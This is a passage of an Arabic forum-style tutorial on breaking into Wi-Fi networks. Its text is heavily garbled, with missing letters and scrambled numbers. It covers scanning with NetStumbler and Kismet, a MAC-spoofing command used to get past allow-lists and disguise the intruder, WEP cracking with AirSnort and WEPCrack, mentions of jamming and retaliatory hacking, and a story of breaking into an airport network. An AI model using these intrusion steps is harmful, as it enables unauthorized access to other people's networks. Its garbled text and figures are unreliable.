لختراقات وھناك طريقة اخرى للحماية وھي تقلیل‬ ‫نسبة الرسال او الطیف التابع للشبكة السكلیة وبذلك بالمكان تحديدھا‪      ‬‬ ‫بحیث لتتخطى حدود شركتك او منزلك‪                                                  ‬‬ ‫اعرف اني قد اكون مافدتك زيادة بس صدفني انا تركت المر لقلك مثل التعلم‪  ‬‬ ‫الذاتي ليوجد يعني المعلومة ترسخ وتظل لبد ‪                                       ..‬‬ ‫المھ م بعض الكتب التي تفیدك كثیرا في ھ ذا المجاااااااااااااااااااااااااااال‪          ‬‬ ‫‪                                              O'Reilly.­.Network.Security.Hacks.chm‬‬ ‫‪               Syngress.Hack.Proofing.Your.Network,Second.edition .pdf‬‬ ‫‪ Mcgraw.Hill.Hacknotes.Network.Security.Portable.Re ference.DDU.pdf‬‬ ‫‪                                                                   ­McGraw­Hill_­_Wi‬‬ ‫‪                       Fi_Handbook._Building_802.11b_Wireless_Netw.chm‬‬ ‫‪                         Syngress.WarDriving.Drive.Detect.Defend.A.Guide.to‬‬ ‫‪                                              .Wireless.Security.Apr.2004­DDU.chm‬‬ ‫‪      Addison Wesley ­ Wireless Security and Privacy ­ Best Practi.chm‬‬ ‫‪                                          ­Syngress.Wireless.Hacking.Projects.for.Wi‬‬ ‫‪                                            Fi.Enthusiasts.Oct.2004.eBook­DDU.pdf‬‬ ‫‪   Addison.Wesley.Real.802.11.Security.Wi­Fi.Protected.Access.A.chm‬‬ ‫‪                                                851‬‬ ‫‪                                     OReilly ­ Wireless Hacks ­ 2003.chm‬‬ ‫‪          Syngress.Hacking.a.Terror.Network.Nov.2004.eBook­DDU.pdf‬‬ ‫‪               Syngress.­.Stealing.the.Network.How.to.Own.the.Box.pdf‬‬ ‫‪                   Syngress.Publishing.Stealing.the.Network.How.to.Ow‬‬ ‫‪                                              n.a.Continent.eBook­LiB.chm‬‬ ‫صدقني لو كنت املك اتصال سريع بالنترنت لرفعتكلم كل ھذه الكتب ولكن اذا‪ ‬‬ ‫اردت ذلك ‪                                                                 ...‬‬ ‫يعني تقدر تحملھم مثل ھ ل الوقت بعد خمسین سنة ‪.....‬وبعدين ماعندي‪    ‬‬ ‫مساحة‪                                                                       ‬‬ ‫انت اطلب من الشباب واكید مايقصروا‪                                         ‬‬ ‫مصطلحات‪                                                                    :‬‬ ‫الشبكة السلكیة تعمل مثلھ ا مثل الشبكة العتیادية لكن يمیزھا ان تعمل‪     ‬‬ ‫بدون الكابلت على تردد ما يقاس بالھرت‪                                    .‬‬ ‫الن لتبسیط الفكرة انظر الى الراديو او الى الستليت تلقیھا نفس الفكرة ‪  ..‬‬ ‫تصور حتى تجیك قناة واحدة يمدوا كبل من مركز البث الى بیتك ‪ .‬تفكیر جمیل‪ ‬‬ ‫الن المستلزماااااات‪                                                         ‬‬ ‫جھاز ‪                                                                      PC‬‬


‫ض‪      ‬‬ ‫كرت شبكة لسلكي ‪..‬انصحك بكرت الشبكة ‪ORiNOCO‬على زعم بعض‬ ‫باختراق‪     ‬‬ ‫ق‬ ‫الھ اكر يقولون انه الفضل في التعامل مع برمجیات الھاكر المتعلقة‬ ‫كويس‪                        ‬‬ ‫س‬ ‫الشبكات السلكي يعني بالعامیة يلقط بشكل‬ ‫ر‪                    ‬‬ ‫ھناك اختیارت اخرى امثال ‪: Cisco ,, D­Link‬وغیرھا الكثر‬ ‫‪                                               ..‬‬ ‫لقط اشارة او بالعامي انطین ‪.‬‬ ‫‪                   ÇäØíä ÕäÚ íÏá‬‬ ‫‪Ç‬‬ ‫اذا اردت عمله بنفسك راجع ھذه الوصلة‬ ‫‪                 >844/<http://www.oreillynet.com/cs/weblog/view/wlg‬‬ ‫ع‪ ‬‬ ‫يجب عند شرائك النطین مراعاة ‪dB‬معدل خسارة الشارة المتلقطة تحدد مع‬ ‫بیاع‪                                                                ‬‬ ‫كل انطین ع‬ ‫الن كل ماكان الـ ‪dBi‬وھي نسبة كسب الشارة فكلما كان ‪dBi‬اكبر كان افضل‬ ‫ل‬ ‫‪...‬يعني‪                                                                       ‬‬ ‫ي‬ ‫الفكرة‪                                          ‬‬ ‫ة‬ ‫شوف الصورة التیة لكي تفھم‬ ‫‪                                     951‬‬ ‫‪                                             ...‬‬ ‫الن اختبر كرت الشبكة عندك ‪.‬‬ ‫التیة‪     ‬‬ ‫ة‬ ‫نقطة ھ امة حاول عندما شرائك كرت الشبكة ان تعرف عنه المعلومات‬ ‫افضل‪     ‬‬ ‫ل‬ ‫ھ ل بامكني ان اركب له النطین ھل يقبل وھ یك امور ‪...‬وانا اعطیتكم‬ ‫اكر‪                                                 ‬‬ ‫نوعیة على قولة شباب الھ ر‬ ‫‪                           ...‬‬ ‫الن لوك نعرف انه للشبكة السلكیة عدة انماط ‪.‬‬ ‫‪1‬الشبكة المفتوحة التي ليتوفر لھا اي حماية يعني للعوام ربما تكون عن قصد‬‫د‬ ‫كبعض خدمات الـ ‪HotSpot‬وربما عن غباءء‪                                      ‬‬ ‫ن‪            ‬‬ ‫‪2‬الشبكة المغلقة يعني الدخول لھا محدد لعضاء الشبكة الفعلیین‬‫‪3‬الشبكة المغلقة مع التشفیر ‪WEP encryption‬يعني تاتي المعطیات فیھا‪    ‬‬‫‪                                                        ..‬‬ ‫مشفرة عند الرسال ‪.‬‬ ‫جدا‪                                                                   ‬‬ ‫جمیل ا‬ ‫الشبكه‪                               ‬‬ ‫ه‬ ‫حبیت اضیف نقطه اخرى بالنسبه لكروت‬ ‫داخلي‪ ‬‬ ‫ي‬ ‫ھ ناك كرت غالي الثمن "جدا "من شركة ثري كوم وھ و مدمج مع انتن‬ ‫ومن مزاياه انه يدعم انواع الشبكات اللسلكیه الثلثه ‪a/b/g‬وسعره في حدودد‪ ‬‬ ‫ي‪ ‬‬ ‫ال ‪052‬دولر "كان معاي واحد منه اعطاني اياه صديق عزيزي علي وھو اخي‬ ‫‪guy from 70‬لكن لما شريت الجھ از الجديد قللي فیه وايرلس بلت ان قلت ايه‬ ‫ه‬ ‫علي‪                                                              ‬‬ ‫قام صادره ي‬ ‫م‪  ‬‬ ‫ونوعیة كروت انتل ‪2200bg‬من وجھة نظري اشوفھا رائعه والفرق انھا ماتدعم‬ ‫البروتوكول القديم ‪a‬وما اظن اننا بحاجه له اغلب الھوتسبوتس تستخدم ‪    b‬‬ ‫واللي معاه قروش زياده يشتري الجھاز تبع ‪g‬والفرق بسیط""‪                  ‬‬ ‫شكرا لك اخوي سلكر على فتحك الموضوع وان شاء االله بنتناقش فیه ونوسعه‬ ‫ه‬ ‫‪                                      061‬‬ ‫المكان‪                                                                 ‬‬ ‫ن‬ ‫بقدر‬ ‫البرنجلز"‪                                   ‬‬ ‫"‬ ‫وعجبني جدا النتن اللي من علبة‬ ‫شي‪                                          ‬‬ ‫على فكره حبیت استفسر عن ي‬ ‫لما كنت ادخل النترنت من بیت زمیلنا سوبر لینكس كنت كل ما ابعد عن ""‪   ‬‬ ‫كانت‪      ‬‬ ‫صندوق الزباله "االله يكرمكم كانت الشاره تضعف ولكن كل ما قربنا ت‬ ‫بوينت‪  ‬‬ ‫ت‬ ‫الشاره تزداد مع العلم اني واقف على خط متوازي من مكان الكسس‬ ‫الرسال‪                            ‬‬ ‫ل‬ ‫تظن انه صندوق الزباله "االله يكرمكم "يزيد‬ ‫الدوات‪                                                                      :‬‬ ‫‪:‬‬ ‫‪                                                                ..‬‬ ‫نكمل الن ‪.‬‬ ‫ماعتقد‪          ‬‬ ‫د‬ ‫تحتاج عند اختراقك لشبكة ما الى ادوات كلمي صحیح على‬ ‫‪                                          Scan‬‬ ‫ت ‪S‬‬ ‫نبدا الن باالمسحات الماسحات‬ ‫‪                  Windows <http://www.microsoft.com‬‬ ‫‪W‬‬ ‫‪1‬لمستخدمي <‪/‬‬‫‪n‬‬ ‫‪netstumbler <http://www.netstumbler.com‬‬ ‫وفرت لنا اداة عظیمة وقوية <‪/‬‬ ‫لداة‪                                                                   ‬‬ ‫ة‬ ‫صورة‬ ‫‪                                 ..‬‬ ‫ھنا والداة تعمل ولقطة عدد من الشبكات ‪.‬‬


‫الدة‪                        ‬‬ ‫ة‬ ‫ناتي الن الى فھم بعض الماعني والرمزر في ھذه‬ ‫ذه‪       ‬‬ ‫اول نلحظ ان الشبكات يرمز لھا برمز دائرة لونھا رمادي ‪..‬الن لناخذ ھ ه‬ ‫الشبكة‪               ‬‬ ‫ة‬ ‫المعلومة ان اللون الرمادي ھو ھو عبارة عن لقط اشارة‬ ‫اما اذا كان اللون برتقالي فھ ذا عبارة عن اشارة جیدة جدا اما اذا كان صفراء فیه‬ ‫ه‬ ‫‪                    ..‬‬ ‫تعني جیدة اما اذا كانت خضراء فھي تعني اشارة ممتازة ‪.‬‬ ‫على الغلب لن تحصل على اللون ال اذا كنت داخل نطاق الشبكة بمعدل جید‬ ‫د‬ ‫الرمادي‪        ‬‬ ‫ي‬ ‫جدا اما اذا كنت خارج نطاق المكان فلن تحصل الى على اللون‬ ‫ذه‪   ‬‬ ‫نلحظ الن بان بعض الدوائر يوجد بداخلھا رمز القفل ھذا يعني على ان ھ ه‬ ‫‪                                      161‬‬ ‫الول‪                                  ‬‬ ‫ل‬ ‫اشبكة مفتوحة او مغلقة راجع الدرس‬ ‫وسوف‪      ‬‬ ‫ف‬ ‫الن اذا نظرنا الى الشريط العلوي للبرنامج نلحظ بعض التسمیات‬ ‫نااا‪                                                      ‬‬ ‫نشرحھا تفصیلل ھ ا‬ ‫‪ MAC :‬عنوان الماك ادرس ‪...‬ھ ناك درس يتحدث بالتفصیل عنه ابحث عنه في‬ ‫ي‬ ‫المنتدي‪                                                                    ‬‬ ‫ي‬ ‫‪ SSID:‬معرف الشبكة لكل شبكة معرف بھا يكون عبارة عن اسم او ارقام اوو‪   ‬‬ ‫ما‪                                                           ‬‬ ‫حتى خلیط بینھ ا‬ ‫ه‪    ‬‬ ‫‪ Name :‬اسم الشبكة على الغلب ياتي فارغ لاحد يھتم بتسمیة شبكته‬ ‫‪                                   WorkGroup‬‬ ‫‪W‬‬ ‫باسماء او لنقل ياتي افتراضیا‬ ‫‪Chan:‬عدد القنوات التي تعمل علیھ ا الشبكة يتراوح بین ‪                 1-41‬‬ ‫ة‪                                          ‬‬ ‫‪Speed :‬السرعة العظمي للشبكة‬ ‫ة‪                                    ‬‬ ‫‪Vendor :‬الشركة الصانعة لكروت الشبكة‬ ‫‪Type :‬نوع الشبكة او نمطھا ‪Server/Clinet ٍ P2P ,,‬وغیرھا‪                   ‬‬ ‫ل‪                                             ‬‬ ‫ملحظة الـ ‪AP‬تمثل نقاط اتصال‬ ‫‪ Encryption:‬ھل يوجد تشفیر ام ل‪                                         ‬‬ ‫ة‪                                              ‬‬ ‫‪ SNR:‬البث السلكي ومقدارة‬ ‫ة‪                                         ‬‬ ‫‪ Signal+:‬الشارة العظمي للشبكة‬ ‫‪  Noise-:‬معدل التشويش يرتبط بعدة امور البعد عن الشبكة وجود عوائق مادية‬ ‫ة‬ ‫وغیرھاا‪                                                                     ‬‬ ‫ة‪                                       ‬‬ ‫‪ SNR+:‬القمیة العظمي للبث الشبكة‬ ‫ة‪                                                  ‬‬ ‫‪ IP Addr :‬اليبي للشبكة‬ ‫ة‪                                                     ‬‬ ‫‪ Subnet:‬قناع الشبكة‬ ‫‪                          Linux <http://www.linux.org‬‬ ‫‪L‬‬ ‫‪2‬لمستخدمي <‪/‬‬‫الفضل‪                  ‬‬ ‫ل‬ ‫ايضا توفرة لكم ادوات بدل واحدة لكني ساقتصر على‬ ‫‪                       ,, >/2­1 kismet <http://www.kismetwireless.net‬‬ ‫‪                                >/Wellenreiter <http://www.google.com‬‬ ‫‪                         kismet <http://www.kismetwireless.net‬‬ ‫‪k‬‬ ‫الداة <‪/‬‬ ‫ناتي الى تثبیت الدة اذھب الى المواقع وحملھاا‪                             ‬‬ ‫كود‪                                                                       :‬‬ ‫‪:‬‬ ‫‪         root@slacker : /home/slackerz# gunzip kismet­feb.04.01.tar.gz‬‬ ‫‪          root@slacker : /home/slackerz# tar ­xvf kismet­feb.04.01.tar‬‬ ‫‪                  10.40.root@slacker : /home/slackerz# cd kismet­feb‬‬ ‫‪                             root@slacker : /home/slackerz# ./configure‬‬ ‫‪                              root@slacker : /home/slackerz# make deb‬‬ ‫‪                                    261‬‬ ‫حسب‪      ‬‬ ‫ب‬ ‫الن الداة تسالك بعض السئلة تجواب علیھا حسب نوعیة كرتك‬ ‫یة‪                                           ‬‬ ‫الخدمات الي ترديھا امور بديھ ة‬ ‫كود‪                                                                      :‬‬ ‫‪:‬‬ ‫‪                                 root@slacker : /home/slackerz# make‬‬ ‫‪                           root@slacker : /home/slackerz#make install‬‬ ‫الدة‪                                        ‬‬ ‫ة‬ ‫ھیك بتكون خلصت من تركیب‬


‫الن شوفھا وھي تعمل‪                                                    ‬‬ ‫طیب الن نشرح بعض البارمترات الخاصة بالداة‪                             ‬‬ ‫الداة تشتغل وانت ‪#‬على النظام ‪..‬من الممكن انھا ماتشتغل فورا وقتھا يجب‬ ‫علیك تعديل الـ ‪configure‬بتاع الداة‪                                       ‬‬ ‫اذھب الى مسار اداة واكتب‪                                               ‬‬ ‫كود‪                                                                      :‬‬ ‫‪                        root@slacker : /usr/local/etc/# pico kismet.conf‬‬ ‫الداة الثانیة <‪Wellenreiter <http://www.google.com /‬مكتوبة بالبريل‪     ‬‬ ‫ولتحتاج الى اكثر من تشغیلھا لتظھر لك واجھةرسومیة جمیلة مقاربة من‪   ‬‬ ‫برنامج <‪                   netstumbler <http://www.netstumbler.com /‬‬ ‫خلصنا من اداوت الـ ‪                                                  Scan‬‬ ‫صراحة توجد ادوات عديدة غیرھا اذكرھا بسرعة‪                             ‬‬ ‫‪                                                       6.9.0­WifiScanner‬‬ ‫‪    ><http://packetstormsecurity.nl/wireless/WifiScanner­0.9.6.tar.gz‬‬ ‫اداة صراحة لم اختبرھ ا الى الن سمعت من بعض اصدقائي بقوتھا ولكن ھناك‬ ‫صعوبة بالتعامل معھا‪                                                      ‬‬ ‫‪                                   361‬‬ ‫اعتقد اننا غطینا موضوع البحث وتقفي الثر بشكل كويس ‪                 ..‬‬ ‫الن ناتي الى نقطة ذكرتھا في فوق ال وھ ي معرف الخدمة الذي ذكرت يكون‬ ‫ھ و عبارة ان احرف او ارقام او خلیط بینھ ما بمعرفتك معرف الخدمة تستطیع‪   ‬‬ ‫الدخول الى الشبكة مادمت بنطاقھا‪                                          ‬‬ ‫موقع الداة <‪wepdecrypt <http://wepdecrypt.sourceforge.net/‬تستخدم‬ ‫القوامیس في عملیة الكسر ‪                                              ...‬‬ ‫ھ ناك اداة ثانیةي تخرج لك ھذه الترامیز وموقعھا ‪                  wepcrack‬‬ ‫<‪<http://wepcrack.sourceforge.net /‬ولنظام لینكس ‪           airsnort‬‬ ‫‪                                               >/<http://www.google.com‬‬ ‫المھاجمة‪                                                                   :‬‬ ‫‪                             O.K let's go to hack's some wireless network‬‬ ‫صراحة اخي ‪ B­Hunter‬شجعني على الكمال ‪                           ...‬‬ ‫وصراحة انا نزلت ھذه السلسة كرمال اخي ‪                    0891worse‬‬ ‫<‪<http://www.s4a.cc/forum/showthread.php?t =4412‬عسى ان‪      ‬‬ ‫يستفید منھا‪                                                                 ‬‬ ‫طبعا لتنسونا من دعاء في ظھ ر الغیب عسى ان ننجح في امتحان الثانوي‪  ‬‬ ‫ونطحش على المعدل‪                                                        ‬‬ ‫حاول عند الھ جوم انك تحط النتین في مكان مرتفع نسبیا عشان تخلص من‪  ‬‬ ‫مشاكل ضعف الشارة‪                                                        ‬‬ ‫‪1‬خش بل صلحیات ‪                                                     ...‬‬‫كما قلت ھ ناك شبكات تاتي بدون معرف خدمة ول حتى اي تقنیة تشفیر‪    ‬‬ ‫تحمي بیانتھا وھذا الوضع الفتراضي لھ ذين الخدمتین ‪ ...‬وطبعا المدراء‪       ‬‬ ‫صحیانین تمام لھذا النقاط‪                                                    ‬‬ ‫في ھ ذه الحالة لتحتاج الى اكثر من اي برنامج ‪ Scan‬الذي تم شرحمھا في‪ ‬‬ ‫الجزء الثاني‪                                                                  ‬‬ ‫ال فعل خدمة الشبكات السلكیة في ويندوز اذھب الى لوحة التحكم الى‪   ‬‬ ‫‪Services‬بعدھا فعل‪                                                          ‬‬ ‫‪ wireless zero configurtion‬وفي لینكس‪                                   ‬‬ ‫كود‪                                                                          :‬‬ ‫‪                            root@slacker:/home/roamer# cd /etc/pcmcia‬‬ ‫‪                               root@slacker:/etc/pcmcia# vi wireless.opts‬‬ ‫‪                                     461‬‬ ‫وعدل بعدھا‪                                                               ‬‬


‫شباب اكید الي عارفین بنظام لینكس فاھمین علي شو عم احكي اما الي‪   ‬‬ ‫بحیاتو مش مركب كرت شبكة ول حتى بیعرف لینكس مش حیفھم ول حیقدر‪ ‬‬ ‫رجب لذلك انا اتبع الشرح على النظامین عشان مايصیر ول ماعرفنا ول شرحك‪ ‬‬ ‫مش تمام‪                                                                 ‬‬ ‫الن سیظھر لك بان النظام لقط عدد من التصالت ھل تريد التصال ‪..‬قل له‪   ‬‬ ‫نعم واترك معرف الخدمة والـ ‪ Network Key‬فارغین واتصل ‪..‬وسوف ترى ايقوة‬ ‫التصال ظھرت ‪                                                          ...‬‬ ‫اعتقد ان بلك في مزحته مع سوبر اتبع نفس الطريقة ‪                    ...‬‬ ‫‪2‬الختراق عن طريق الماك ادرس ‪                              Spoof MAC‬‬‫راجع مواضیع المنتدى لستزادة حول الـ ‪                               MAC‬‬ ‫المھ م في مجال يكون مدير الشبكة عنده قلیل من التفكیر ويتبع طريقة اعمل‪ ‬‬ ‫بلوك لي مجھ ول حیث ياخذ ارقام الماك ادرس تبع شبكته ويعطیھا الصلحیات‪ ‬‬ ‫الي عاوزھ ا ويعمل بلوك لي اتصال قادم من الخارج عن طريق رقم كرت‪        ‬‬ ‫الشبكة ‪                                                                ..‬‬ ‫الن طريقة الدخول ھي تزيیف ھ ذا الرقم فائدة اخرى للموضوع عدم معرفة من‪ ‬‬ ‫اتي الھجوم يفكروه ھجوم داخلي ‪...‬ھھھھھھھھه‪                            ‬‬ ‫ساذكر لكم بعض الدوات‪                                                   ‬‬ ‫‪                          >/smac <http://www.klcconsulting.net/smac‬‬ ‫‪                                                               bwmachak‬‬ ‫‪       ><http://www.irvineunderground.org/blackwave/bwmachak.zip‬‬ ‫ھدول لنظام ويندوز ھناك اداة واحدة لنظام لینكس ال وھي ‪    SirMACsAlot‬‬ ‫‪                              >/<http://www.michiganwireless.org/tools‬‬ ‫ملحظة ‪:‬عنوان الماك ادرس من المستحیل تغییر لنه عنوان فیزائي الشركة‪  ‬‬ ‫المصنعة للكرت تعطیه ياه تحت اشراف منظمة لكن ھذه البرمجیات ليھام نظام‬ ‫التشغیل والشبكة انه تغیر‪                                                 ‬‬ ‫الداة الولى ‪SMAC‬مابیغالبھ ا شرح بعد التنصیب البرنامج حقه ‪$$$‬يطلعلك‪   ‬‬ ‫كرت الشبكة والماك ادرس تیعه كل ماعلیك انك تبدله الداة الثانیة تعمل تحت‪ ‬‬ ‫منصة ‪DOS‬وھي سھلة ايضا‪                                              ‬‬ ‫اما لنظام لینكس‪                                                           ‬‬ ‫كود‪                                                                      :‬‬ ‫‪             654321root@slacker:/root# ./SirMACsAlot.pl eth0 00022D‬‬ ‫الـ ‪0eth‬غیرھا برقم كرت الشبكة لديك ‪                                  ...‬‬ ‫‪                                    561‬‬ ‫‪65432100022D :‬عنوان الماك ادرس ‪                                  ..‬‬ ‫المھم بعد التغییر خش على الشبكة ‪                                 ....‬‬ ‫‪3‬الھجوم على الشبكات المشفرة ‪                                      ..‬‬‫كما ذكرت سابقا ھ ناك بعض الشبكات التي تتبع طريقة تشفیر في نقل‪      ‬‬ ‫معطیاتھا عبر الھواء والتشفیر يسمى ( ‪ Wired Equivalent Protection (WEP‬‬ ‫نستعمل االدوات التي تم ذكرھ ا في الدرس الثاني من السلسة االله يكرمك‪ ‬‬ ‫اخي ‪B­Hunter‬عشان ثبتت الدروس ‪..‬ھیك تلقوھا متستلسة وبعد فترة‪   ‬‬ ‫سوف يقام التثبیت ‪                                                    ...‬‬ ‫المھ م عندنا اداتین واحدة مشتركة لويندوز ولینكس وھي ‪        wepcrack‬‬ ‫<‪<http://wepcrack.sourceforge.net /‬والثانیة لنظام لینكس ‪    airsnort‬‬ ‫‪                                          >/<http://airsnort.shmoo.com‬‬ ‫الن ان كانت الشببكة محمیة بھ ذه الحماية كل ماعلیك تشغیل الدوات وبعد‪ ‬‬ ‫اخراج الترمزي كل ماعلیك ‪                                              ..‬‬ ‫ھ و فتح اعدادات الشبكة <‪------‬ادخال معرف الشبكة <‪-------‬ادخال الـ ‪WEP‬‬ ‫‪                                                                      key‬‬ ‫طیب كیف اعرف انو الشبكة محمیة بھ ذا التشفیر عن طريق برامج الـ ‪  Scan‬‬ ‫‪                                  661‬‬


‫‪ 4‬ھجوم حجب الخدمة ‪                                                  ...‬‬‫انشاء االله اشرحه قريبا‪                                                       ‬‬ ‫لماذا لنه لیس ھجوم بالبرامج او غیره يعتمد على الـ ‪ hardware‬كثیر ‪..‬يعني‬ ‫انت بحاجة فیه للراديو ‪                                                    ...‬‬ ‫لنقل انه لیس حجب خدمة بل تشويش على الخدمة ‪                   ...‬‬ ‫ملحق‪                                                                       :‬‬ ‫عبارة عن ملحق لمور اعتقدتھا في البداية بديھیة‪                           ‬‬ ‫اعتقد اني ذكرت ان ھ ناك قنوات للشبكات السلكیة تتراوح من ‪1-41‬قناة الن‬ ‫سوف نحدد الترددات بالنسبة لشبكات على مقیاس ‪              802.11b‬‬ ‫اول بعض التعاريف الساسیة ‪                                              ..‬‬ ‫يقاس مدى الشبكات السلكیة بمقیاس يدعي ھرتز ‪                     ..‬‬ ‫الموجة ‪1‬ھرتز ‪..‬تشكلھا موجات البحر‪                                       ‬‬ ‫الموجة ‪0001‬كیلو ھرتز تشكلھا محطاث بث الراديو‪                          ‬‬ ‫الموجة ‪0000001‬ملیون ھرتز تشكلھا محطات بث التلفزيون ‪,,‬التلفونات‪     ‬‬ ‫السلكیة‪                                                                     ‬‬ ‫الموجة ‪0000000001‬میجا ھرتز تشكلھا الشبكات السلكیة ‪,,‬موجات‪       ‬‬ ‫المايكروويف ‪,,‬الھ اتف المحمول وخاصة الشبكات المعتمدة على نظام ‪ GPS‬‬ ‫ولیس ‪ GSM ,,‬الستاليتات‪                                                  ‬‬ ‫الن ناتي لنحدد مدى ھذه الشبكات من تقنیة ‪ 802.11b‬في البلدان التیة‪  ‬‬ ‫‪                                                    USA ,, Japan ,, Europa‬‬ ‫القناة ‪                                                          1 2.412GHZ‬‬ ‫القناة ‪                                                                2 714.2‬‬ ‫القناة ‪                                                                3 224.2‬‬ ‫القناة ‪                                                                4 724.2‬‬ ‫القناة ‪                                                                5 234.2‬‬ ‫القناة ‪                                                                6 734.2‬‬ ‫القناة ‪                                                                7 244.2‬‬ ‫القناة ‪                                                                8 744.2‬‬ ‫القناة ‪                                                                9 254.2‬‬ ‫القناة ‪                                                              01 754.2‬‬ ‫القناة ‪                                                              11 264.2‬‬ ‫القناة ‪                                                              21 764.2‬‬ ‫‪                                    761‬‬ ‫القناة ‪                                                           31 2. 274‬‬ ‫القناة ‪                                                            41 484.2‬‬ ‫‪                                                                    :Story‬‬ ‫الیوم سوف اتكلم عن اجمل المور في نظري ال وھو تعقب الثر والخذ بالثار‪  ‬‬ ‫صراحة اذا تم اختراق موقعك او شبكتك او حتى جھازك ھذ ايدل على ضعف‪   ‬‬ ‫من الجانب الوقائي من جھ تك لكم الجمیل ان تعرف ماذا فعل المخترق لكي‪   ‬‬ ‫يتمكن منك والجمل انك ترد علیه ھ جومه ‪..‬لتريه مدى ضعفه وان اختراقه لك‪ ‬‬ ‫لم يكون البسبب اھمال منك ولیس ضعف ‪                                 ..‬‬ ‫احییك اخي الماحي ‪ Ma7I‬على فكرة عمل الدروس كتاب لكن ان نفذتھا اريد‪ ‬‬ ‫منك تصحیح الخطاء الملئیة وذلك بسبب العجلة في الكتابة‪                  ‬‬ ‫صراحة سوف اجعل ھذا الدرس كسیناريو‪                                     ‬‬ ‫لني كنت صراحة عاوز اشرح السناريوھات المحتملة بھجمات الـ ‪WarDriving‬‬ ‫بس قلت لنفسي اخلیھ ا لخي بلك ‪..‬بماانه قال سوف يشرحھا‪              ‬‬ ‫السیناريو الول مترجم من كتاب ‪                                   Syngress.-‬‬ ‫‪                               .Stealing.the.Network.How.to.Own.the.Box‬‬ ‫والثاني خیالي بحت ‪                                                    ...‬‬ ‫الول مترجم‪                                                               ‬‬


‫‪                                                                   ...‬‬ ‫نبدا ‪.‬‬ ‫استعمال‪       ‬‬ ‫ل‬ ‫اذا ھ اانا ثانیة في المطار ‪.‬في انتظار الرحلة القادمة يجب علي‬ ‫موظف‪   ‬‬ ‫ف‬ ‫الطیران لكي اقابل صديقتي ومن كثر سفري عبر ھذه الخطوط اصبح‬ ‫مبتسما‪                              ‬‬ ‫ا‬ ‫الستقبال يعرفني وكلما راني يھز راسه‬ ‫من‪     ‬‬ ‫وانا في طريقي الى الطائرة مشیت من خلل ممر ضیق وعیوني تنظر ن‬ ‫خلل الزجاج الى مكان لرتاح فیه الى ان ياتي وقت لرحلتي توجھت الى نافذة‬ ‫ة‬ ‫‪          ..‬‬ ‫تطل على المدرج وجلست على كرسي كان مغطى بقماش ابیض ‪.‬‬ ‫الشنطة‪                            ‬‬ ‫ة‬ ‫بھدوء سحب جھ ازي المحمول البتوب من‬ ‫ن‪    ‬‬ ‫كان نظامي ‪ W2K‬على حاسوبي وكنت انظر حولي الىل الشخاص الذين‬ ‫في‪   ‬‬ ‫يضیعون وقتھم اما في قراءة الصحف او شرب القھوة لمضاء الوقت وكان ي‬ ‫مفتوح‪             ‬‬ ‫ح‬ ‫اسفل المدرج الذي انا جالس فیه رجل عجوز كان نائما وفمه‬ ‫مفیدة‪  ‬‬ ‫ة‬ ‫كنت استغرب من ھؤلء الشخاص الذين يقتولن وقتھم في اشیاء غیر‬ ‫بتشغیل‪ ‬‬ ‫ل‬ ‫‪...‬انا على عكسھم تماما حتاج شئ لیملئ وقت الفراغ لذلك قمت‬ ‫بالنترنت‪                                                 ‬‬ ‫ت‬ ‫الحاسوب والتصال‬ ‫اينما‪  ‬‬ ‫ا‬ ‫الشكبات السلكیة عظیمة خلصتنا من الرتباط بطول معین او حد معین‬ ‫‪                                      861‬‬ ‫النترنت‪                                                      ‬‬ ‫ت‬ ‫كنت شبك مع‬ ‫في‪  ‬‬ ‫اينما كنت في السیارة على الشاطئ في العمل في الحیاء في الشقق ي‬ ‫معاك‪                         ‬‬ ‫ك‬ ‫المطاعم في النزل السكنیة والجامعات النترنت‬ ‫وفاتح‪ ‬‬ ‫ح‬ ‫مع اني مستغرب انه واحد جالس في ماكدونالد وھو عم ياكل الھامبرجر‬ ‫روعة‪                  ‬‬ ‫ة‬ ‫حاسبه النقال والدھن عم يغطي لوحة المفاتییح شغلة‬ ‫ان‪   ‬‬ ‫على كل حال انا مرتاح ومتمدد على كراسي النتظار وخطرت ببالي فكرة ن‬ ‫‪                                                     ..‬‬ ‫اخترق شبكة المطار ‪.‬‬ ‫م‪                      ‬‬ ‫وبدات العمل ‪..‬كل ھذا الي فوق علك مصدي ھون المھم‬ ‫في البداية شغلت برنامج ‪ Network Stumbler‬لكي التقط اي نقاط اتصال اوو‪   ‬‬ ‫الجوار‪                                             ‬‬ ‫ر‬ ‫اي شكبات لسلكیة في‬ ‫تتفاوت‪       ‬‬ ‫ت‬ ‫مقطة التصال الوحیدة التي ظھرت لي ھي شبكة المطار ‪..‬عادة‬ ‫الشبكة‪    ‬‬ ‫ة‬ ‫الحمايات بین الشركات الكبیرة والصغیرة في الحماية والتامین على‬ ‫ة‬ ‫للشبكة‬ ‫مع برنامج ‪ NetStumbler,‬استطیع ان اعرف عناوين الـ ‪MAC address‬‬ ‫معیرف الخدمة ‪ SSID‬القناة الي شغالة علیھ ا الشبكة نوع نقطة التصال ھل‪   ‬‬ ‫سابقة‪                ‬‬ ‫ة‬ ‫ھناك تشفیر ام ل وغیرھ ا الكثیر كله مشروح في دروس‬ ‫‪                    ..‬‬ ‫المھ م لقطت شبكة واحدة وكانت من النوع غیر المشفر ‪.‬‬ ‫التیة‪                                                   ‬‬ ‫ة‬ ‫للتوضیح انظرالصورة‬ ‫ت‪   ‬‬ ‫عادة تستعمل تقنیة التشفیر ‪ WEP Wired Equivalent Privacy‬في شبكات‬ ‫‪                                                      802.11b‬‬ ‫‪8‬‬ ‫من معامرية‬ ‫على الرغم من وجود طرق عديدة لكسره الى ان خبراء المن مازل يستعملونه‬ ‫ه‬ ‫شرحنا‪ ‬‬ ‫ا‬ ‫وطرق الھجوم علیه اما بالقوامیس او الھجمات النشطة او السلبیة وقد‬ ‫‪            AirSnort‬‬ ‫‪A‬‬ ‫ادوات تكسر ھذه النوع من الترامیز سابقا كـ ‪WEPCrack‬و‬ ‫من حسن حظي ان شبكة المطار لم تكن مشفرة لنه لو كانت مشفرة لم يكن‬ ‫ن‬ ‫يحین‪    ‬‬ ‫ن‬ ‫لدي الوقت الكافي لسكر الحماية فلم يكن لدي اكثر من ساعة حتى‬ ‫سفري‪                                                               ‬‬ ‫ي‬ ‫موعد‬ ‫لكي‪     ‬‬ ‫بدون التشفیر الـ ‪ WEP‬ليجب علي ال ان اعرف معرف الخدمة ‪ SSID‬ي‬ ‫‪                                    961‬‬ ‫ادخل الشبكة ومعرف الخدمة لیس مخفي او انه باسورد اذا لحظت في برنامج‬ ‫ج‬ ‫و‪                                                    ‬‬ ‫نیتستمبر قلك شو ھو‬ ‫‪   W2K‬‬ ‫‪W‬‬ ‫الن يجب علیه تعديل الـ 